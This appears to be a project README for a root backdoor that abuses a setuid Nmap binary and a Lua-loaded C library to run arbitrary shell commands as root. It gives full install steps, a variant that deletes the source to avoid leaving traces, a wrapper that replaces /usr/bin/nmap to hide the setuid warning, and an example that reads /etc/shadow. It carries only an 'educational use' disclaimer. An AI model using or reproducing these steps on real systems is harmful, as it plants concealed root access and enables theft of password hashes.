Backdoor that leverages Nmap with setuid permissions to execute commands as root through a Lua-loaded C library
0. Required installs:
sudo apt install gcc libcap-dev liblua5.4-dev
1. Compilation:
gcc -shared -fPIC -o socket.so socket.c -I/usr/include/lua5.4 -llua5.4
2. Permissions:
sudo chmod 4755 /usr/bin/nmap
3. Prepare files:
sudo cp socket.nse /usr/share/nmap/scripts/ && sudo cp socket.so /usr/share/nmap/nselib/ && sudo nmap --script-updatedb
Or if you don't want to leave any traces of the files, you can use:
rm socket.c && sudo mv socket.nse /usr/share/nmap/scripts/ && sudo mv socket.so /usr/share/nmap/nselib/ && sudo nmap --script-updatedb
Optionally, if you want to remove the nmap warning flag about the setuid, you can do something like this:
sudo mv /usr/bin/nmap /usr/bin/nmap_ && printf '%s\n' '#!/bin/bash' 'exec /usr/bin/nmap_ "$@" 2> >(grep -v -F "setuid" >&2)' | sudo tee /usr/bin/nmap > /dev/null && sudo chmod 755 /usr/bin/nmap
nmap -p 631 --script socket.nse --script-args socket.command=whoami localhost
nmap -p 631 --script socket.nse --script-args socket.command="cat /etc/shadow" localhost
- Commands are executed via
popen()which uses/bin/sh - If the command runs in an infinite loop, no output will be displayed
- The method will work regardless of the specified target or port (a port is specified to avoid executing the command multiple times)
Thanks to the developers of all the modules used in this project and special thanks to hackerfantastic for giving me some pointers to make this work and for telling me the story of the old method (patched about 20 years ago) that used sudo chmod 4755 /usr/bin/nmap, nmap --interactive, and !sh to get a root shell, which is the inspiration for this new one
This is a tool for educational / personal use only — the author is not responsible for any misuse
Shield:
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
